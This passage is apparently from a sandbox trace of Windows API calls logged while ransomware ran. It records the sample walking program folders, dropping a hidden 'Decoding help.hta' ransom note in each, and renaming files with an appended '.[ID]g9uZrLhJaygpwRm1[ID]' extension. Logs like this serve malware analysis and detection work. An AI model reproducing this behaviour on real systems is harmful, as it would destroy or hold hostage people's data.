Sidebar\\Gadgets\\Weather.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*" [0050.121] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*") returned 69 [0050.121] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\Decoding help.hta" [0050.121] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\decoding help.hta")) returned 0x1 [0050.122] lstrcmpiW (lpString1="Decoding help.hta", lpString2="logo.png") returned -1 [0050.122] lstrlenW (lpString="logo.png") returned 8 [0050.122] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*" [0050.122] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*") returned 69 [0050.122] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\", lpString2="logo.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\logo.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\logo.png" [0050.122] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\logo.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\logo.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\logo.png" [0050.122] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\logo.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\logo.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\logo.png.[ID]g9uZrLhJaygpwRm1[ID]" [0050.122] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\logo.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\logo.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\logo.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\logo.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0050.472] FindNextFileW (in: hFindFile=0x5e2cb0, lpFindFileData=0x1c1dfd30 | out: lpFindFileData=0x1c1dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcf13d2d, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbcf13d2d, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbf1ad59c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x172a, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 0 [0050.472] FindClose (in: hFindFile=0x5e2cb0 | out: hFindFile=0x5e2cb0) returned 1 Thread: id = 432 os_tid = 0xbac [0043.907] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*", lpFindFileData=0x1c31fd30 | out: lpFindFileData=0x1c31fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2d70 [0045.186] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.186] FindNextFileW (in: hFindFile=0x5e2d70, lpFindFileData=0x1c31fd30 | out: lpFindFileData=0x1c31fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.186] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.186] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.186] FindNextFileW (in: hFindFile=0x5e2d70, lpFindFileData=0x1c31fd30 | out: lpFindFileData=0x1c31fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4c91ed4, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0xa4c91ed4, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0xa06f97f7, ftLastWriteTime.dwHighDateTime=0x1ca03fb, nFileSizeHigh=0x0, nFileSizeLow=0x3912, dwReserved0=0x0, dwReserved1=0x0, cFileName="adojavas.inc", cAlternateFileName="")) returned 1 [0045.186] lstrcpyW (in: lpString1=0x42b8870, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" [0045.186] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned 48 [0045.186] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\Decoding help.hta" [0045.186] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\ado\\decoding help.hta")) returned 0xffffffff [0045.186] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\ado\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0045.466] WriteFile (in: hFile=0x230, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1c31fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1c31fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0045.467] CloseHandle (hObject=0x230) returned 1 [0045.467] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0048.670] lstrcmpiW (lpString1="Decoding help.hta", lpString2="adojavas.inc") returned 1 [0048.670] lstrlenW (lpString="adojavas.inc") returned 12 [0048.670] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" [0048.670] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned 48 [0048.670] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\", lpString2="adojavas.inc" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc" [0048.670] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc" [0048.670] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc.[ID]g9uZrLhJaygpwRm1[ID]" [0048.671] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adojavas.inc"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\ado\\adojavas.inc.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0048.671] FindNextFileW (in: hFindFile=0x5e2d70, lpFindFileData=0x1c31fd30 | out: lpFindFileData=0x1c31fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4085067, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0xa4085067, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0xa0661283, ftLastWriteTime.dwHighDateTime=0x1ca03fb, nFileSizeHigh=0x0, nFileSizeLow=0x3a67, dwReserved0=0x0, dwReserved1=0x0, cFileName="adovbs.inc", cAlternateFileName="")) returned 1 [0048.671] lstrcpyW (in: lpString1=0x5fbd100, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" [0048.671] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned 48 [0048.671] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\Decoding help.hta" [0048.671] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\ado\\decoding help.hta")) returned 0x1 [0048.671] lstrcmpiW (lpString1="Decoding help.hta", lpString2="adovbs.inc") returned 1 [0048.671] lstrlenW (lpString="adovbs.inc") returned 10 [0048.671] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" [0048.671] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned 48 [0048.671] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\", lpString2="adovbs.inc" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc" [0048.671] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc" [0048.671] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc.[ID]g9uZrLhJaygpwRm1[ID]" [0048.671] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adovbs.inc"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\ado\\adovbs.inc.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0048.672] FindNextFileW (in: hFindFile=0x5e2d70, lpFindFileData=0x1c31fd30 | out: lpFindFileData=0x1c31fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0048.672] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0048.672] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0048.672] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0048.674] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" [0048.674] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned 48 [0048.674] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US" [0048.674] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\*.*" [0048.674] GlobalMemoryStatus (in: lpBuffer=0x1c31fd10 | out: lpBuffer=0x1c31fd10) [0048.674] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x247d5818, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x764 [0048.681] CloseHandle (hObject=0x764) returned 1 [0048.681] FindNextFileW (in: hFindFile=0x5e2d70, lpFindFileData=0x1c31fd30 | out: lpFindFileData=0x1c31fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6129cc5, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0x6129cc5, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x80fe7780, ftLastWriteTime.dwHighDateTime=0x1ca0422, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msader15.dll", cAlternateFileName="")) returned 1 [0048.681] lstrcpyW (in: lpString1=0x5fbd100, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" [0048.681] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned 48 [0048.681] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\Decoding help.hta" [0048.681] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\ado\\decoding help.hta")) returned 0x1 [0048.681] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msader15.dll") returned -1 [0048.681] lstrlenW (lpString="msader15.dll") returned 12 [0048.681] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" [0048.681] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned 48 [0048.681] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\", lpString2="msader15.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msader15.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msader15.dll" [0048.681] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msader15.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msader15.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msader15.dll" [0048.681] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msader15.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msader15.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msader15.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0048.682] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msader15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msader15.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msader15.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\ado\\msader15.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0048.682] FindNextFileW (in: hFindFile=0x5e2d70, lpFindFileData=0x1c31fd30 | out: lpFindFileData=0x1c31fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f7da10b, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8f7da10b, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8f80026c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x16e000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msado15.dll", cAlternateFileName="")) returned 1 [0048.682] lstrcpyW (in: lpString1=0x5fbd100, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" [0048.682] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned 48 [0048.682] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\Decoding help.hta" [0048.682] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\ado\\decoding help.hta")) returned 0x1 [0048.682] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msado15.dll") returned -1 [0048.682] lstrlenW (lpString="msado15.dll") returned 11 [0048.682] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" [0048.682] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned 48 [0048.682] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\", lpString2="msado15.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado15.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado15.dll" [0048.682] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado15.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado15.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado15.dll" [0048.682] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado15.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado15.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado15.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0048.682] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msado15.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado15.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\ado\\msado15.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0049.897] FindNextFileW (in: hFindFile=0x5e2d70, lpFindFileData=0x1c31fd30 | out: lpFindFileData=0x1c31fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x833eacc3, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x833eacc3, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x833eacc3, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msado20.tlb", cAlternateFileName="")) returned 1 [0050.243] lstrcpyW (in: lpString1=0x11027670, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" [0050.243] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned 48 [0050.243] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\Decoding help.hta" [0050.243] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\ado\\decoding help.hta")) returned 0x1 [0050.243] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msado20.tlb") returned -1 [0050.243] lstrlenW (lpString="msado20.tlb") returned 11 [0050.243] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" [0050.243] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned 48 [0050.243] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\", lpString2="msado20.tlb" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb" [0050.243] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb" [0050.244] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb.[ID]g9uZrLhJaygpwRm1[ID]" [0050.244] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado20.tlb"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\ado\\msado20.tlb.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0050.244] FindNextFileW (in: hFindFile=0x5e2d70, lpFindFileData=0x1c31fd30 | out: lpFindFileData=0x1c31fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x833eacc3, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x833eacc3, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x833eacc3, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x12000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msado21.tlb", cAlternateFileName="")) returned 1 [0050.244] lstrcpyW (in: lpString1=0x11027670, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" [0050.244] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned 48 [0050.244] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\Decoding help.hta" [0050.244] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\ado\\decoding help.hta")) returned 0x1 [0050.244] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msado21.tlb") returned -1 [0050.244] lstrlenW (lpString="msado21.tlb") returned 11 [0050.244] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" [0050.244] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned 48 [0050.244] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\", lpString2="msado21.tlb" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb" [0050.244] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb" [0050.244] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common 